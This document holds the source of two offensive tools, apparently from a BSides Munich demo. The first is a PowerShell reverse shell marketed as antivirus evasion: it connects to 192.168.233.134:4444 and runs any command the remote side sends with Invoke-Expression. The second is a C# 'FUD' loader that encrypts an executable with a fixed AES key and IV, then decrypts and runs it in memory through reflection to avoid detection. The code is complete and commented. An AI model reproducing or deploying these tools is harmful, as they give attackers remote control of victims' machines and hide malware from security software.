Authors:
PowerShell script used for creating a reverse TCP connection and bypassing AV
# Banner printed to the local console only; nothing below depends on it.
Write-Host "########################################################################";
Write-Host "# #";
Write-Host "# PowerShell AV EVASION #";
Write-Host "# #";
Write-Host "# #";
Write-Host "# 2020 #";
Write-Host "# For Education Purposes #";
Write-Host "# #";
Write-Host "########################################################################";
# Handles and buffers are pre-declared so the finally block can test each one
# for $null and release only what was actually created.
$client = $null;
$stream = $null;
$buffer = $null;
$writer = $null;
$data = $null;
$result = $null;
try {
# Outbound TCP connection to a hard-coded peer (192.168.233.134:4444). There is
# no TLS and no peer authentication on this channel: whatever the socket delivers
# is executed below with the privileges of the user running the script.
$client = New-Object Net.Sockets.TcpClient("192.168.233.134", 4444);
$stream = $client.GetStream();
# 1 KiB receive buffer; input is decoded as ASCII, so non-ASCII bytes are not preserved.
$buffer = New-Object Byte[] 1024;
$encoding = New-Object Text.AsciiEncoding;
# AutoFlush so every Write/WriteLine reaches the peer without an explicit Flush().
$writer = New-Object IO.StreamWriter($stream);
$writer.AutoFlush = $true;
Write-Host "Bsides Munich...";
$bytes = 0;
# Outer loop: one prompt / command / response cycle per iteration. It ends when
# Read() returns 0, i.e. when the peer has closed the connection.
do {
$writer.Write("PS>");
# Inner loop: drain the socket into $data until no further bytes are pending.
do {
$bytes = $stream.Read($buffer, 0, $buffer.Length);
if ($bytes -gt 0) {
$data = $data + $encoding.GetString($buffer, 0, $bytes);
}
} while ($stream.DataAvailable);
if ($data.Length -gt 0) {
# The received text is handed verbatim to Invoke-Expression; stderr is merged
# into stdout (2>&1) and the combined output is returned to the peer as one string.
try {
$result = Invoke-Expression -Command $data 2>&1 | Out-String;
} catch {
# Only the inner exception's message is reported; when there is no inner
# exception this presumably evaluates to $null and an empty line is sent.
$result = $_.Exception.InnerException.Message;
}
$writer.WriteLine($result);
# Reset the accumulated command text for the next cycle.
Clear-Variable -Name "data";
}
} while ($bytes -gt 0);
} catch {
# Connection/setup failures are reported on the local console, not to the peer.
Write-Host $_.Exception.InnerException.Message;
} finally {
# StreamWriter.Close() already closes the underlying NetworkStream; the later
# stream/client Close()/Dispose() calls are therefore redundant but harmless.
if ($writer -ne $null) {
$writer.Close();
$writer.Dispose();
}
if ($stream -ne $null) {
$stream.Close();
$stream.Dispose();
}
if ($client -ne $null) {
$client.Close();
$client.Dispose();
}
# NOTE(review): Byte[] exposes Clear() only through its IList implementation;
# whether this call zeroes the buffer or fails depends on PowerShell's member
# resolution for arrays — confirm on the target PowerShell version.
if ($buffer -ne $null) {
$buffer.Clear();
}
# Drop the last command text and its output from the session's variable scope.
if ($data -ne $null) {
Clear-Variable -Name "data";
}
if ($result -ne $null) {
Clear-Variable -Name "result";
}
}
FUD .NET project using System.Reflection
//Program.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
namespace Nice
{
/// <summary>
/// Loader entry point: encrypts <c>myvr.exe</c> from the working directory into
/// <c>sr.txt</c>, reads that file back, decrypts it in memory and runs it as a
/// .NET assembly inside this process via reflection.
/// </summary>
class Program
{
static void Main(string[] args)
{
// The plaintext executable must already be present on disk next to the loader.
// EnCmE also returns the ciphertext, so the ReadAllBytes on the next line merely
// re-reads what was just written.
uitls.EnCmE(File.ReadAllBytes("myvr.exe"), "sr.txt");
byte[] cc = File.ReadAllBytes("sr.txt");
// 19 ms pause; nothing in this file depends on it.
Thread.Sleep(19);
// Assembly.Load(byte[]) maps the decrypted image into the current AppDomain
// (the decrypted bytes are never written to a file), then the target's entry
// point is invoked with no instance and no arguments.
System.Reflection.Assembly.Load(uitls.DeCmE(cc)).EntryPoint.Invoke(null, null);
}
}
}
//uitls.cs
using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Security.Cryptography;
namespace Nice
{
/// <summary>
/// AES-CBC helpers with a fixed 128-bit key and IV embedded in the source. Because
/// key and IV are constants shared by both methods, the transform is deterministic
/// and reversible by anyone holding the binary: it obfuscates the payload, it does
/// not protect it. No integrity check (MAC) is applied to the ciphertext.
/// </summary>
class uitls
{
/// <summary>
/// Encrypts <paramref name="Bytes"/> with the embedded key/IV, writes the ciphertext
/// to <paramref name="outputFile"/> and returns it.
/// </summary>
/// <param name="Bytes">Plaintext. With <see cref="PaddingMode.None"/> its length must be a
/// multiple of the 16-byte block size; otherwise TransformFinalBlock throws a CryptographicException.</param>
/// <param name="outputFile">Path the ciphertext is written to (created or overwritten).</param>
/// <returns>The ciphertext; same length as the input.</returns>
public static byte[] EnCmE(byte[] Bytes, string outputFile)
{
// Same constants as in DeCmE, duplicated rather than shared.
byte[] Th3Key = new byte[] { 0x4C, 0xDA, 0x9, 0x5D, 0x29, 0x3E, 0xB2, 0xDE, 0xB3, 0x81, 0x91, 0xF4, 0xC3, 0xFA, 0xA3, 0xD5 };
byte[] Th3Iv = new byte[] { 0xFA, 0x3D, 0xD7, 0xC2, 0xFC, 0x87, 0xD2, 0x85, 0xC9, 0x93, 0x63, 0xA6, 0x49, 0x9B, 0x1A, 0x28 };
// RijndaelManaged is marked obsolete (SYSLIB0022) on .NET 6 and later.
RijndaelManaged myRj = new RijndaelManaged();
myRj.Mode = CipherMode.CBC;
// No padding: ciphertext length equals plaintext length; non-block-aligned input is rejected.
myRj.Padding = PaddingMode.None;
ICryptoTransform theTransformer = myRj.CreateEncryptor(Th3Key, Th3Iv);
byte[] RArr = theTransformer.TransformFinalBlock(Bytes, 0, Bytes.Length);
// Clear() disposes the algorithm instance; the ICryptoTransform itself is never disposed.
myRj.Clear();
File.WriteAllBytes(outputFile, RArr);
return RArr;
}
/// <summary>
/// Decrypts <paramref name="Bytes"/> with the same embedded key/IV used by <see cref="EnCmE"/>.
/// </summary>
/// <param name="Bytes">Ciphertext. With <see cref="PaddingMode.None"/> its length must be a
/// multiple of the 16-byte block size; otherwise TransformFinalBlock throws a CryptographicException.</param>
/// <returns>The plaintext; same length as the input.</returns>
public static byte[] DeCmE(byte[] Bytes)
{
// Same constants as in EnCmE, duplicated rather than shared.
byte[] key = new byte[] { 0x4C, 0xDA, 0x9, 0x5D, 0x29, 0x3E, 0xB2, 0xDE, 0xB3, 0x81, 0x91, 0xF4, 0xC3, 0xFA, 0xA3, 0xD5 };
byte[] iv = new byte[] { 0xFA, 0x3D, 0xD7, 0xC2, 0xFC, 0x87, 0xD2, 0x85, 0xC9, 0x93, 0x63, 0xA6, 0x49, 0x9B, 0x1A, 0x28 };
// RijndaelManaged is marked obsolete (SYSLIB0022) on .NET 6 and later.
RijndaelManaged RjEnC = new RijndaelManaged();
RjEnC.Mode = CipherMode.CBC;
// No padding: no padding bytes are verified or stripped, so a corrupted or
// truncated ciphertext still "decrypts" to garbage without any error.
RjEnC.Padding = PaddingMode.None;
ICryptoTransform cTransform = RjEnC.CreateDecryptor(key, iv);
byte[] theArr = cTransform.TransformFinalBlock(Bytes, 0, Bytes.Length);
// Clear() disposes the algorithm instance; the ICryptoTransform itself is never disposed.
RjEnC.Clear();
return theArr;
}
}
}